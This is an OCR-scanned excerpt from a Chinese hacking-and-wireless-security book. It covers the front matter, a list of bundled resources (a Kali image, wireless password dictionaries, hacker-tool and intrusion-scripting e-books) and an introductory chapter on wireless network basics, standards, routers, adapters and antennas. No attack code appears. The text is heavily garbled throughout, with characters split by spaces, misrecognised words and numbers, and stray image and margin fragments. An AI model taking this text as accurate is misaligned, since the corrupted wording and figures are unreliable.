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目前 ， 无 线 网 络 安全 问题 日 益 突出 。“ 工 欲 善 其 事 必 先 利 其 器 ”， 只 有 选择 合适 的 攻 
防 工具 ， 才 能 起 到 事半功倍 的 作用 。 本 书 除了 讲解 有 线 端 的 攻防 策略 外 ， 还 把 目前 市 场 上 
流行 的 无 线 攻防 等 热点 融入 书 中 。 


本 书 特色 


知识 丰富 全 面 : 涵盖 了 所 有 黑客 攻防 知识 点 ， 由 浅 入 深 地 介绍 黑客 攻防 方面 的 技能 。 
图 文 并 茂 : 注重 操作 ， 图 文 并 茂 ， 在 介绍 案例 的 过 程 中 ， 每 一 个 操作 均 有 对 应 的 插 
图 。 这 种 图 文 结合 的 方式 便于 读者 在 学 习 中 直观 、 清 晰 地 看 到 操作 的 过 程 以 及 效果 ， 从 而 
能 更 快 地 理解 和 掌握 。 
案例 丰富 : 把 知识 点 融 汇 于 系统 的 案例 实 训 当中 ， 并 且 结 合 经 典 案例 进行 讲解 和 拓 
展 ， 进 而 达到 “ 知 其 然 ， 并 知 其 所 以 然 ” 的 效果 。 
提示 技巧 ， 贴 心 周到 : 本 书 对 读者 在 学 习 过 程 中 可 能 遇 到 的 疑难 问题 以 “提示 ”的 形 
式 进行 说 明 ， 以 免 读 者 在 学 习 过 程 中 走 弯路 。 
本 书 赠送 资源 
同步 微 视频 。 
精美 教学 PPT 课 件 。 
CDlinux 系 统 文件 包 。 
Kali 虚 拟 机 镜像 文件 。 
无 线 密码 的 字典 文件 。 
黑客 工具 (107 个) 速 查 电子 书 。 : 
常用 黑客 命令 (160 个 ) 速 查 电 子 书 。 由 有 
180 页 常见 故障 维修 电子 书 。 文件 包 镜像 文件 
Windows 10 系 统 使 用 和 防护 技巧 电子 书 。 
8 大 经 典 密码 破解 工具 电子 书 。 
加 密 与 解密 技术 快速 入 门 小 白 电 子 书 。 
网 站 入 侵 与 黑客 脚本 编程 电子 书 。 
黑客 命令 全 方位 详解 电子 书 。 
读者 可 扫描 右 方 二 维 码 获取 本 书 赠送 资源 。 
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读者 对 象 


本 书 不 仅 适 合 网 络 安全 从 业 人 员 及 网 络 管理 员 ， 而 且 适 合 广大 网 络 爱 好 者 ， 也 可 作为 
大 、 中 专 院 校 相 关 专业 的 参考 书 。 


写作 团队 


本 书 由 长 期 研究 网 络 安全 的 网 络 安全 技术 联盟 编著 ， 另 外 还 有 王 秀 英 、 王 英 英 、 刘 玉 
萍 、 刘 芜 、 王 条 条 、 王 攀登 、 王 婷 婷 、 张 芳 、 李 小 威 、 王 猛 、 王 维 维 、 李 佳 康 、 王 秀 荣 、 
王 天 护 、 皮 素 芹 等 人 参与 了 编写 工作 。 在 编写 过 程 中 ， 编 者 们 尽 所 能 地 将 最 好 的 讲解 呈现 
给 读者 ， 但 也 难免 有 朴 漏 和 不 妥 之 处 ， 敬 请 不 音 指正 。 若 您 在 学 习 中 遇 到 困难 或 疑问 ， 或 
有 何 建议 ， 可 通过 电子 邮件 zhangmin2@tup.tsinghua.edu.cn 与 我 们 联系 。 
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第 1 章 ”无线 网 络 快速 入 门 


无 线 网 络 ， 特 别 是 无 线 局 域 网 给 我 们 的 生活 带 来 了 极 大 的 方便 ， 为 我 们 提供 了 无 处 不 
在 的 、 高 带宽 的 网 络 服务 ， 但 是 ， 由 于 无 线 信道 特有 的 性 质 ， 使 得 无 线 网 络 连接 具有 不 稳 
定性 ， 且 容易 受到 黑客 的 攻击 ， 从 而 大 大 影响 了 服务 质量 ， 本 章 介绍 一 些 有 关 无 线 网 络 的 


基础 常识 。 


1.1 什么 是 无 线 网 络 


无 线 网 络 (Wireless network) 是 采用 
无 线 通 信 技 术 实现 的 网 络 ， 与 有 线 网 络 的 
用 途 十 分 类 似 ， 最 大 的 不 同 在 于 传输 媒介 
的 不 同 ， 一 般 来 说 ， 无 线 网 络 可 以 分 为 狭 
义 无 线 网 络 和 广义 无 线 网 络 两 种 。 


1.1.1 狭义 无 线 网 络 


狭义 无 线 网 络 就 是 我 们 常 说 的 无 线 局 
域 网 ， 是 基于 802.11b/g/n 标 准 的 WLAN 无 线 
局 域 网 ， 具 有 可 移动 性 、 安 装 简单 、 高 灵 
活性 和 高 扩展 能 力 等 特点 ， 作 为 对 传统 有 
线 网 络 的 延伸 ， 这 种 无 线 网 络 在 许多 特殊 
环境 中 得 到 了 广泛 地 应 用 ， 如 企业 内 部 、 
学 校内 部 、 家 庭 等 。 这 种 网 络 的 缺点 是 覆 
盖 范 围 小 ， 使 用 距离 在 5S~30m 内 。 

随 着 无 线 数据 网 络 解决 方案 的 不 断 推 
出 ， 全 球 WiFi 设 备 迅 猛 增长 ， 相 信 在 不 久 
的 将 来 ， “不论 在 任何 时 间 、 任 何 地 点 都 
可 以 轻松 上 网 ”这 一 目标 就 会 被 实现 ， 下 
面 介绍 一 些 有 关 无 线 网 络 的 概念 


1. 无 线 网 络 的 起 源 


无 线 网 络 的 起 源 ， 可 以 追溯 到 第 二 
次 世界 大 战 期 间 ， 当 时 美军 采用 无 线 电信 
号 作 资料 的 传输 ， 他 们 研发 出 了 一 套 无 
线 电 传输 技术 ， 并 且 采 用 相当 高 强度 的 加 
密 技 术 。 当 时 美军 和 盟 军 都 广泛 使 用 这 项 
技术 。 


无 线 电 传输 技术 让 许多 学 者 得 到 了 灵 
感 ， 在 1971 年 时 ， 夏 威 夷 大 学 (University 
of Hawaii) 的 研究 员 创造 了 第 一 个 基于 
封包 式 技术 的 无 线 电 通信 网 络 ， 被 称 作 
ALOHNET 网 络 ， 这 可 以 算是 相当 早期 的 无 
线 局 域 网 络 (WLAN) 了 。 最 早 的 WLAN 
包括 了 7 台 计 算 机 ， 它 们 采用 双向 星 型 拓扑 
(bi-directional star topology) ， 横 跨 四 座 


夏威夷 的 岛 凡 ， 中 心计 算 机 放置 在 瓦 胡 鸟 器 让 


(Oahu Island) 上 ， 从 那 时 开始 ， 无 线 网 络 加 
可 说 是 正式 诞生 了 。 下 图 为 一 个 星 型 拓扑 


结构 示意 图 。 
号 、 


a Ta 
ee 


2. IEEE 802.11 标 准 


IEEE 802.11 标 准 第 一 个 版 本 发 表 于 
1997 年 ， 其 中 定义 了 介质 访问 接 入 控制 层 
(MAC 层 ) 和 物理 层 。 物 理 层 定义 了 工作 
在 2.4GHz 的 ISM 频 段 上 的 两 种 无 线 调 频 方 
式 和 一 种 红外 传输 的 方式 ， 总 数据 传输 速 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


率 设计 为 2Mb/s。 两 个 设备 之 间 的 通信 可 以 以 自由 直接 (ad hoc) 的 方式 进行 ， 也 可 以 在 
基站 (Base Station，BS) 或 者 访问 点 (Access Point，AP) 的 协调 下 进行 。 
对 于 无 线 网 络 重要 发 展 标准 ， 用 户 有 必要 了 解 一 下 IEEE 802.11 标 准 的 发 展 过 程 ， 具 


体内 容 见 下 表 。 
表 802.11 标 准 的 发 展 史 
标 准 说 明 
IEEE 802.11 | 1997 年 ， 原 始 标准 “2Mb/s， 工 作 在 2.4GHz) 
IEEE 802.11a | 1999 年 ， 物 理 层 补充 〈54Mb/s， 工 作 在 5GHz) 
IEEE 802.11b | 1999 年 ， 物 理 层 补充 (11Mb/s 工 作 在 2.4GHz) 
IEEE 802.11c | 符合 802.1D 的 媒体 接 入 控制 层 桥接 (MAC Layer Bridging) 


IEEE 802.11d | 根据 各 国 无 线 电 规定 做 的 调整 


IEEE 802.11e 


对 服务 等 级 (Quality of Service.QoS) 的 支持 


IEEE 802.11f | 基站 的 互 连 性 (IAPPInter-Access Point Protocol) ，2006 年 2 月 被 IEEE 批 准 撤销 


IEEE 802.11g | 2003 年 ， 物 理 层 补充 〈54Mb/s， 工 作 在 2.4GHz) 
IEEE 802.11h | 2004 年 ， 无 线 覆 盖 半 径 的 调整 ， 室 内 〈indoor) 和 室外 〈outdoor) 信道 (5GHz 频 段 ) 


IEEE 802.11i | 2004 年 ， 无 线 网 络 的 安全 方面 的 补充 


IEEE 802.11n | 350MbAs 甚 至 高 达 475Mb/s 


2009 年 9 月 通过 正式 标准 ，WLAN 的 传输 速率 由 802.11a 及 802.11g 提 供 的 54Mb/s、108Mb/s， 提 高 至 


IEEE 802.11p | 2010 年 ， 这 个 协定 主要 用 在 车 用 电子 的 无 线 通 信 上 


目前 ， 无 线 网 络 及 设备 主要 使 用 的 是 
IEEE 802.llb/g/n 标 准 ， 尤 其 以 IEEE 802.llg 
最 为 普及 ， 不 过 IEEE 802.lln 正 在 以 飞快 的 
速度 赶 超 。 

除了 上 面 的 IEEE 标 准 ， 另 外 有 一 个 被 
称 为 IEEE 802.11b+ 的 技术 ， 通 过 PBCC 技 术 
(packet binary convolutional code) 在 IEEE 
802.11b 〈2.4GHz 频 段 ) 基础 上 提供 22Mbys 
的 数据 传输 速率 。 但 这 事实 上 并 不 是 一 个 
IEEE 的 公开 标准 ， 而 是 一 项 产权 私有 的 
技术 。 


3. WiFi 联 盟 


WiFi 联 盟 成 立 于 1999 年 ， 是 一 家 全 球 
及 非 营利 性 的 行业 协会 ， 拥 有 几 百 家 企业 
会 员 ， 致 力 解决 符合 IEEE 802.11 标 准 的 产 
品 的 生产 和 设备 兼容 性 问题 ， 从 而 推动 无 
线 局 域 网 产业 的 发 展 ， 以 增强 移动 无 线 、 


便携 、 移 动 和 家 用 设备 的 用 户 体验 为 目 
标 。 自 2003 年 3 月 WiFi 联 盟 开展 此 项 认证 以 
来 ， 已 经 有 超过 4000 多 种 产品 获得 了 WiFi 
GERTIFIED 指 定 认 证 标志 ， 有 力 地 推动 了 
WiFi 产 品 和 服务 在 消费 者 市 场 和 企业 市 场 
两 方面 的 全 面 开展 。 

WiFi 联 盟 认 证 标志 就 是 无 线 技术 支持 
的 象征 ， 被 广泛 应 用 在 智能 手机 、 平 板 计 算 
机 、 笔 记 本 计算 机 和 各 种 便携 式 设备 上 。 


4. 无 线 网 络 的 组 成 


无 线 网 络 由 以 下 几 个 部 分 组 成 。 

(1) 站 点 (Station) 。 网 络 最 基本 的 组 
成 部 分 ， 通 常 指 的 就 是 无 线 客户 端 。 

(2) 基本 服务 单元 (Basic Service Set， 
BSS) 。 网 络 最 基本 的 服务 单元 。 最 简单 的 
服务 单元 可 以 只 由 两 个 无 线 客户 端 组 成 ， 
客户 端 可 以 动态 地 连接 (Associate) 到 基本 


服务 单元 中 。 

(3) 分 配 系统 (Distribution System， 
DS) 。 分 配 系统 用 于 连接 不 同 的 基本 服务 
单元 ， 分 配 系统 使 用 的 媒介 逻辑 上 和 基本 
服务 单元 使 用 的 媒介 是 截然 分 开 的 ， 尽 管 
它们 物理 上 可 能 会 是 同一 个 媒介 ， 例 如 同 
一 个 无 线 频道 。 

(4) 接 入 点 (Access Point，AP) 。 无 
线 接 入 点 既 有 普通 有 线 接 入 点 的 能 力 ， 又 
有 接 入 到 上 一 层 网 络 的 能 力 。 其 实 AP 和 无 
线路 由 器 是 有 区 别 的 ， 相 比 来 说 ， 无 线路 
由 器 的 功能 更 多 ， 不 过 在 基本 功能 方面 ， 
两 者 并 无 实质 性 的 区 别 ， 所 以 在 实际 应 用 
中 ， 都 会 将 无 线路 由 器 称 为 AP。 

(5) 扩展 服务 单元 (Extended Service 
Set，ESS) 。 由 分 配 系统 和 基本 服务 单元 
组 合 而 成 。 这 种 组 合 是 逻辑 上 的 ， 并 非 物 
理 上 的 ， 不 同 的 基本 服务 单元 有 可 能 在 地 
理 位 置 上 相差 其 远 。 分 配 系统 也 可 以 使 用 
各 种 各 样 的 技术 。 

(6) 关口 (Portal) 。 用 于 将 无 线 局 域 
网 和 有 线 局 域 网 或 其 他 网 络 联系 起 来 ， 是 
一 个 逻辑 成 分 。 

以 上 组 成 部 分 使 用 了 3 种 媒介 ， 站 点 
使 用 的 无 线 媒介 ， 分配 系 统 使 用 的 媒介 ， 
以 及 和 无 线 局 域 网 集成 一 起 的 其 他 局 域 网 
使 用 的 媒介 ， 物 理 上 它们 可 能 相互 重 县 。 
IEEE 802.11 只 负责 在 站 点 使 用 的 无 线 媒介 
上 寻找 地 址 ， 分 配 系 统 和 其 他 局 域 网 的 寻 
址 不 属于 无 线 局 域 网 的 范围 。 


5. 无 线 网 络 的 运行 原理 


要 想 建 立 一 个 有 效 运 行 的 无 线 网 络 ， 
首先 需要 至 少 一 个 AP， 如 无 线路 由 器 ， 然 
后 是 至 少 一 个 无 线 客 户 端 ， 即 装 有 无 线 网 
卡 的 便携 式 设 备 ， 如 计算 机 、 手 机 、 平 板 
计算 机 等 。 硬 件 准 备 完成 后 ，AP 每 100ms 
将 SSID 信 和 号 封包 广播 一 次 ， 无 线 客 户 端 
可 以 借 此 决定 是 否 要 和 这 一 个 SSID 的 AP 
连接 ， 使 用 者 还 可 以 设 定 要 连接 到 哪 一 个 
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SSID。 这 就 好 比 用 户 使 用 智能 手机 连接 周 
边 的 WiFi 一 样 ， 可 以 有 选择 地 进行 连接 。 
不 过 ，WiFi 系 统 总 是 对 客户 端 开放 其 连接 
标准 ， 并 支持 漫游 ， 这 是 WiFi 的 优点 。 


1.1.2 ”广义 无 线 网 络 


广义 无 线 网 络 主要 包含 3 个 方面 ， 分 别 首 
是 WPAN、WLAN 和 WWAN， 下 面 分 别 进 
行 介 绍 


1. WPAN 


WPAN (Wireless Personal Area Net- 
work， 无 线 个 人 局 域 网 通信 技术 ) 即 常 
说 的 无 线 个 人 局 域 网 。 无 线 个 人 局 域 网 
(WPAN) 是 一 种 采用 无 线 连接 的 个 人 局 域 
网 。 它 被 用 在 诸如 电话 、 计 算 机 、 附 属 设 
备 以 及 小 范围 (个 人 局 域 网 的 工作 范围 一 
般 是 在 10m 以 内 〉 内 的 数字 助理 设备 之 间 的 
通信 。 
无 线 个 人 局 域 网 (WPAN) 是 一 种 
与 无 线 广 域 网 《WWAN) 、 无 线 局 域 网 
(WLAN) 并 列 但 覆盖 范围 相对 较 小 的 
无 线 网 络 。 在 网 络 构成 上 ，WPAN 位 于 整 
个 网 络 链 的 末端 ， 用 于 实现 同一 地 点 终端 
与 终端 间 的 连接 ， 如 连接 手机 和 蓝牙 耳机 
等 ，WPAN 设 备 具 有 价格 便宜 、 体 积 小 、 
易 操 作 和 功 耗 低 等 优点 。 
支持 无 线 个 人 局 域 网 的 技术 包括 : 蓝 
牙 、ZigBee、 超 频 波段 (UWB) 、IDA、 
HomeRF 等 ， 其 中 蓝牙 技术 在 无 线 个 人 局 域 
网 中 使 用 最 广泛 ， 下 面 就 来 介绍 几 种 主要 
的 技术 。 
e 蓝牙 (Bluetooth) : 蓝牙 是 一 种 短 
距离 无 线 通信 技术 ， 它 可 以 用 于 在 
较 小 的 范围 内 通过 无 线 连接 的 方式 
实现 固定 设备 或 移动 设备 之 间 的 网 
络 互联 ， 从 而 在 各 种 数字 设备 之 间 
实现 灵活 、 安 全 、 低 动 耗 、 低 成 本 
的 语音 和 数据 通信 。 

蓝牙 技术 的 一 般 有 效 通信 范围 为 10m， 
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强 的 可 以 达到 100m 左 右 ， 其 最 高 速率 可 达 
1Mb/s。 其 传输 使 用 的 功 耗 很 低 ， 广 泛 应 用 
于 无 线 设 备 ， 如 平板 计算 机 、 手 机 、 智 能 电 
话 等 领域 。 下 图 为 一 个 智能 手机 的 蓝牙 设置 
界面 ， 在 其 中 可 以 开启 与 关闭 蓝牙 。 


中 国电 信息 日 志 DI 会 我 D1548 
蓝牙 
开关 
蓝牙 【 ®) 
设备 名 称 4 
接收 的 文件 
可 用 设备 
EB:E1:BC:3C:1F.30 
有 搜 索 到 旧 标 设备 ? 查看 可 能 原因 
去 到 
E47 vo | 


e IDA (红外 ) : IDA 是 红外 数据 组 
织 (Infrared Data Association) 的 简 
称 ， 目 前 广泛 采用 的 ITDA 红 外 连接 
技术 就 是 由 该 组 织 提出 的 ， 到 目前 
为 止 ， 全 球 采用 IrDA 技 术 的 设备 超 
过 了 5000 万 部 。 

IrDA 技 术 的 主要 特点 有 : 利用 红外 
传输 数据 ， 无 须 专 门 申请 特定 频段 的 使 用 
执照 ， 设 备 体积 小 、 功 率 低 ; 由 于 采用 点 
到 点 的 连接 方式 ， 数 据 传输 受到 的 干扰 较 
小 ， 数 据 传输 速率 高 ， 可 达 1Gb/s。 但 存在 
一 定 的 技术 缺陷 ， 如 受 视 距 影响 其 传输 距 
离 短 、 要 求 通信 设备 的 位 置 固定 、 其 点 对 
点 的 传输 连接 无 法 灵活 地 组 成 网 络 等 。 


2. WLAN 


WLAN (Wireless Local Area Networks， 无 线 
局 域 网 ) 即 上 面 所 说 的 “狭义 无 线 网 络 ”， 
具体 请 参考 上 面 狭 义 无 线 网 络 的 内 容 。 


3. WWAN 


WWAN (Wireless Wide Area Network, 
无 线 广 域 网 通信 技术 〉 即 常 说 的 无 线 广 域 
网 。WWAN 技 术 是 使 得 笔记 本 计算 机 或 
者 其 他 的 设备 装置 在 蜂窝 网 络 覆盖 范围 内 
可 以 在 任何 地 方 连接 到 互联 网 。 目 前 全 球 
的 无 线 广域网 络 主要 采用 GSM 及 CDMA 技 
术 ， 其 他 还 有 3G 或 者 4G 等 技术 。 

简单 地 说 ，WWAN 指 的 就 是 通过 通 
信 设 备 和 通信 网 络 来 上 网 ， 不 管 是 以 前 的 
GSM、EDGE 和 CDMA， 还 是 现在 的 3G、 
4G 网 络 ， 只 要 用 计算 机 中 的 PC 卡 装 SIM 
卡 ， 或 者 把 手机 连 在 笔记 本 计算 机 上 当 作 
Modem 连 网 ， 都 叫 WWAN。 


1.2 ”认识 无 线路 由 器 


无 线路 由 器 是 应 用 于 用 户 上 网 、 带 有 
无 线 覆 盖 功 能 的 路 由 器 ， 它 和 有 线路 由 器 
的 作用 是 一 样 的 ， 唯 一 的 不 同 就 是 无 线路 由 
器 的 项 部 或 者 尾部 多 了 一 个 或 者 几 个 天 线 ， 
其 作用 就 是 提供 无 线 网 络 的 支持 。 除 此 以 
外 ， 其 他 无 论 是 外 观 ， 或 者 是 内 在 配置 页 面 
都 和 同 款 型 的 有 线路 由 器 一 模 一 样 。 

市 面 上 每 一 个 厂商 的 无 线 产品 都 有 
自己 的 特点 ， 下 图 为 美 版 思科 Linksys 
WRT1900AC 双 频 无 线路 由 器 ， 该 路 由 器 具 
有 4 个 天 线 ， 支 持 用 户 根据 需要 对 天 线 进行 
拆卸 和 换 装 ， 非 常 方便 。 另 外 ， 该 路 由 器 
支持 802.11b/g 协 议 ， 其 特点 是 使 用 多 个 无 
线 来 分 工 进 行 无 线 数据 的 接收 与 发 送 。 


目前 ， 市 场 占有 率 比 较 高 的 无 线路 由 
器 是 TP-LINK， 其 性 价 比 比较 高 。 下 图 为 
TP-LINK 千 兆 无 线路 由 器 ， 具 有 高 速 双核 、 
覆盖 更 远 、 家 长 控制 、 一 键 禁用 等 功能 。 
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为 方便 大 家 选 购 无 线路 由 器 ， 下 面 
把 目前 市 面 上 常见 的 无 线 设备 厂商 列举 出 
来 ， 包 括 厂商 名 称 、 官 方 网 站 以 及 个 人 建 
议 等 信息 见 下 表 。 


表 ”常见 无 线路 由 器 


厂商 名 称 官方 网 站 个 人 建议 
Linksys( 领 势 ) www.linksys.com/cn/ 价格 昂贵 ， 性 能 好 
D-LINK ( 友 讯 ) www.dlink.com.cn 性 价 比 不 错 ， 性 能 稳定 
TP-LINK( 普 联 ) www.tp-link.com.cn 性 价 比较 高 ， 市 场 占 有 率 较 高 
Netgear (网 件 ) 价格 比较 贵 ， 性 能 不 错 
ASUS (华硕 ) 不 太 稳定 ， 价 格 适中 
Tenda (腾达 ) 性 价 比较 高 ， 性 能 稳定 


MERCURY (水 星 ) 


1.3 了解 无 线 网 卡 


对 于 初次 接触 无 线 网 络 的 用 户 来 说 ， 
无 线 网 卡 与 无 线 上 网 卡 是 有 些 迷 惑 的 ， 本 
节 就 来 介绍 什么 是 无 线 网 卡 ， 什 么 是 无 线 
上 网 卡 。 


1.3.1 无 线 网 卡 


无 线 网 卡 是 终端 无 线 网 络 设备 ， 是 不 
通过 有 线 连 接 ， 采 用 无 线 信 号 进行 数据 传 
输 的 终端 ， 有 时 也 被 称 为 WiFi 卡 ， 根 据 
接口 类 型 的 不 同 ， 主 要 有 PCMCIA 无 线 网 
卡 、PCI 无 线 网 卡 、Mini-PCI 无 线 网 卡 、 
USB 无 线 网 卡 、CF/SD 无 线 网 卡 几 类 。 

PCI 无 线 网 卡 : 主要 用 于 台式 计算 机 
中 ， 下 图 为 TP-LINK 出 品 的 PCI 无 线 网 卡 。 


S 


Www.mercurycom.com.cn 


价格 较 高 ， 性 能 比较 稳定 


PCMCIA 无 线 网 卡 ， 主要 用 于 笔记 本 计 
算 机 中 ， 下 图 为 Linksys 出 品 的 PCMCIA 无 
线 网 卡 。 


USB 无 线 网 卡 : 这 种 网 卡 不 管 是 台式 
机 用 户 还 是 笔记 本 用 户 ， 只 要 安装 了 驱动 
程序 ， 都 可 以 使 用 ， 下 图 为 LB-LINK 出 品 
的 USB 无 线 网 卡 。 
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Mini-PCI 无 线 网 卡 : Mini-PCI 为 内 置 型 
无 线 网 卡 ， 被 广泛 应 用 于 笔记 本 计算 机 之 
中 ， 其 优点 是 无 须 占用 PC 卡 或 USB 插 槽 ， 
并 且 免 去 了 随时 随身 携 一 张 PC 卡 或 USB 卡 
的 麻烦 。 

这 几 种 无 线 网 卡 在 价格 上 差距 不 大 ， 
在 性 能 和 功能 上 也 差不多 ， 用 户 可 根据 自 
己 的 需要 来 选择 。 在 距离 上 来 说 ， 无 线 网 
卡 是 依靠 接收 附近 无 线 网 络 信号 来 上 网 
的 ， 这 个 信号 源 不 能 离 得 太 远 ， 一 般 无 线 
网 卡 是 配合 无 线路 由 器 来 使 用 的 ， 使 用 距 
离 在 5~30m 内 。 


并 时 1.3.2 无线 上 网 卡 


无 线 上 网 卡 指 的 是 无 线 广域网 卡 ， 是 依 


靠 接收 无 线 宽带 运营 商 在 公共 场所 发 出 的 网 


络 信 号 来 上 网 的 ， 这 个 信号 源 可 以 离 无 线 上 
网 的 计算 机 很 远 ， 如 联通 的 CDMA1X 上 网 
卡 、 移 动 的 GPRS 无 线 上 网 卡 、 电 信 的 EVDO 


pg 无 线 上 网 卡 以 及 移动 联通 的 3G 卡 、4G 卡 等 。 


无 线 上 网 卡 的 作用 于 功能 相当 于 有 线 的 


闻 ; 调制 解 调 器 ， 也 就 是 我 们 俗称 的 “ 猫 ”， 它 


可 以 在 拥有 无 线 信号 覆盖 的 任何 地 方 ， 利 用 
无 线 上 网 卡 来 连接 到 互联 网 上 。 从 理论 上 
来 讲 ， 假 如 你 购买 了 移动 的 无 线 上 网 卡 ， 
那么 在 有 移动 基站 信号 覆盖 的 地 方 都 可 以 
进行 无 线 上 网 。 

一 般 来 讲 ， 无 线 上 网 卡 的 信号 强度 
要 比 有 线 网 卡 差 一 些 ， 但 也 能 满足 一 些 基 
础 的 网 络 应 用 ， 如 浏览 网 页 、 收 发 邮件 、 
网 络 聊天 等 。 不 过 ， 随 着 无 线 网 络 技术 发 
展 ， 尤 其 是 现在 的 EVDO、TD-CDMA 等 
3G/4G 技 术 的 出 现 ， 使 得 无 线 上 网 速度 大 大 
提升 。 下 图 为 中 国电 信 推 出 的 天 距 4G 无 线 


上 网 卡 。 
“~ 


无 线 上 网 卡 一 般 只 针对 笔记 本 计算 机 
用 户 ， 常 用 的 接口 类 型 为 USB 接 口 ， 但 也 
有 PCMCIA 接 口 类 型 的 ， 下 图 为 中 兴 的 4G 
无 线 上 网 卡 ， 作 为 硬件 ， 一 般 在 用 户 购 买 
无 线 上 网 套餐 的 时 候 ， 运 营 商会 赠送 无 线 
上 网 卡 。 


1.4 了 解 天 线 


无 线 局 域 网 中 的 天 线 可 以 扩展 无 线 网 
络 的 覆盖 范围 ， 天 线 有 多 种 类 型 ， 根 据 方 
向 性 的 不 同 ， 天 线 分 为 全 向 和 定向 两 种 。 


1.4.1 全 向 天 线 


全 向 天 线 ， 即 在 水 平方 向 上 表现 为 
360” 均 匀 辐 射 ， 也 就 是 平常 所 说 的 无 方 
向 性 ， 在 垂直 方向 上 表现 为 有 一 定 宽度 的 
波束 ， 一 般 情况 下 波 办 宽度 越 小， 增益 越 
大 。 全 向 天 线 在 移动 通信 系统 中 一 般 应 用 
于 郊 县 大 区 制 的 站 型 ， 有 覆盖 范围 大 。 下 图 
为 连接 在 无 线 网 卡 上 的 全 向 天 线 。 


室内 全 向 天 线 适合 于 无 线路 由 器 、AP 
这 样 的 需要 广泛 覆盖 信号 的 设备 上 ， 它 可 
以 将 信号 均匀 分 布 在 中 心 点 周围 360” 全 方 
位 区 域 ， 适 用 于 连接 点 距离 较 近 ， 分 布 角 
度 范围 大 ， 且 数量 较 多 的 情况 ， 如 无 线路 
由 器 上 的 天 线 ， 就 是 室内 全 向 天 线 。 下 图 
为 目前 常见 的 无 线路 由 器 形状 。 


那么 简单 地 讲 ， 全 向 天 线 就 相当 于 以 
天 线 为 圆心 ， 其 传输 距离 为 半径 ， 画 一 个 
圆 ， 这 个 圆 内 就 是 无 线 信 号 的 覆盖 范围 ， 
一 般 来 说 ， 在 实际 应 用 过 程 中 ， 半 径 多 为 
10 一 30m， 这 也 是 为 什么 能 在 街道 探测 到 那 
些 穿 出 墙壁 的 路 由 器 信号 的 原因 之 一 。 

如 果 将 全 向 天 线 安装 在 户外 ， 则 必须 
安装 在 大 楼 顶端 或 高 处 ， 并 且 位 于 信号 覆 
盖 区 的 中 央 位 置 ， 以 便于 其 他 指向 性 天 线 
装置 通信 ， 构 成 单 点 对 多 点 的 星 型 拓扑 。 


1.4.2 ”定向 天 线 


定向 天 线 ， 在 水 平方 向 上 表现 为 一 
定 角 度 范围 辐射 ， 也 就 是 平常 所 说 的 有 方 
向 性 。 同 全 向 天 线 一 样 ， 波 辨 宽度 越 小 ， 
增益 越 大 。 定 向 天 线 在 通信 系统 中 一 般 应 
用 于 通信 距离 远 ， 履 盖 范 围 小 ， 目 标 密度 
大 ， 频 率 利用 率 高 的 环境 。 

定向 天 线 有 各 种 不 同 的 款式 与 形状 ， 
如 Patch 天 线 、Panel 天 线 和 八木 天 线 等 ， 经 
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常用 于 无 线 区 域 网 络 中 短 距离 的 桥接 ， 例 
如 ， 跨 马路 的 两 栋 大 楼 ， 或 者 空间 扩展 的 
厂房 、 仓 库 等 。 

用 户 也 可 以 按 以 下 方式 来 思考 全 向 天 
线 和 定向 天 线 之 间 的 关系 : 全 向 天 线 会 向 
四 面 八方 发 射 信号 ， 前 后 左右 都 可 以 接收 
到 信号 ， 定 向 天 线 就 好 像 在 天 线 后 面 章 一 
个 碗 状 的 反射 面 ， 信 号 只 能 向 前 面 传递 ， 
射 向 后 面 的 信号 被 反射 面 挡住 并 反射 到 前 
方 ， 加 强 了 前 面 的 信号 强度 ， 可 以 想象 定 
向 天 线 的 主要 辐射 范围 像 一 个 倒立 的 不 太 
完整 的 圆锥 。 

此 外 ， 还 有 专门 用 于 长 距离 通信 的 高 
方向 性 天 线 ， 有 极 窗 的 波束 宽度 和 很 高 的 
增益 值 ， 也 被 称 为 高 增益 指向 性 天 线 ， 如 
碟 形 天 线 和 格 状 天 线 ， 通 常用 于 点 对 点 的 
通信 连接 ， 传 输 距离 高 达 40km。 因 为 波束 
非常 窄 ， 因 此 天 线 彼此 之 间 必 须要 很 精准 
地 瞄准 ， 而 且 天 线 之 间 的 直 视 必须 没有 任 
何 阻碍 物 。 

通过 上 文 能 够 形象 地 认识 到 什么 是 全 
向 天 线 ， 什 么 是 定向 天 线 ， 那 么 在 实际 应 
用 时 该 注意 些 什 么 呢 ? 如 果 需 要 满足 多 个 站 
点 ， 并 且 这 些 站 点 是 分 布 在 AP 的 不 同方 向 
时 ， 需 要 采用 全 向 天 线 ; 如 果 集 中 在 一 个 
方向 ， 建 议 采 用 定向 天 线 ; 另外 还 要 考虑 
天 线 的 接头 形式 是 否 和 AP 匹 配 、 天 线 的 增 
益 大 小 等 是 否 符合 自己 的 需求 。 

对 于 室外 天 线 ， 在 安装 的 过 程 中 ， 天 
线 与 无 线 AP 之 间 需 要 增加 防 雷 设备 ， 定 向 
天 线 要 注意 天 线 的 正面 朝向 远 端 站 点 的 方 


向 ; 天 线 应 该 安装 在 尽 可 能 高 的 位 置 ， 天 呐 商 如 


线 和 站 点 之 间 尽 可 能 满足 视 距 ， 即 肉 腿 可 乔 吧 


见 ， 中 间 避 开 障碍 。 


1.5 ”熟悉 无 线 网 络 的 术语 


下 面 是 无 线 网 络 安全 中 常会 涉及 的 基 昌 区 


本 术语 ， 了 解 这 些 术 语 ， 可 以 帮助 用 户 更 
好 地 维护 无 线 网 络 安全 。 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


(1) WiFi。WiFi 是 一 种 允许 电子 设备 
连接 到 一 个 无 线 局 域 网 (WLAN) 的 技 
术 ， 通 常 使 用 2.4G UHF 或 5G SHF ISM 射 
频频 段 。 连 接 到 无 线 局 域 网 通常 是 有 密码 
保护 的 ;但 也 可 是 开放 的 ， 这 样 就 允许 在 
WLAN 范围 内 的 任何 设备 可 以 连接 上 。 

(2) SSID。 SSID (Service Set Identi- 
fier， 服 务 集 标识 符 ) 技术 可 以 将 一 个 无 
线 局 域 网 分 为 几 个 需要 不 同 身份 验证 的 子 
网 络 ， 每 一 个 子 网 络 都 需要 独立 的 身份 验 
证 ， 只 有 通过 身份 验证 的 用 户 才 可 以 进入 
相应 的 子 网 络 ， 防 止 未 被 授权 的 用 户 进入 
本 网 络 。SSID 可 以 是 任何 字符 ， 最 大 长 度 
为 32 个 字符 。 

(3) WAP。WAP (Wireless Application 
Protocol， 无 线 应 用 协议 ) 是 一 项 全 球 性 的 
网 络 通信 协议 。 它 使 移动 mtermnet 有 了 一 个 
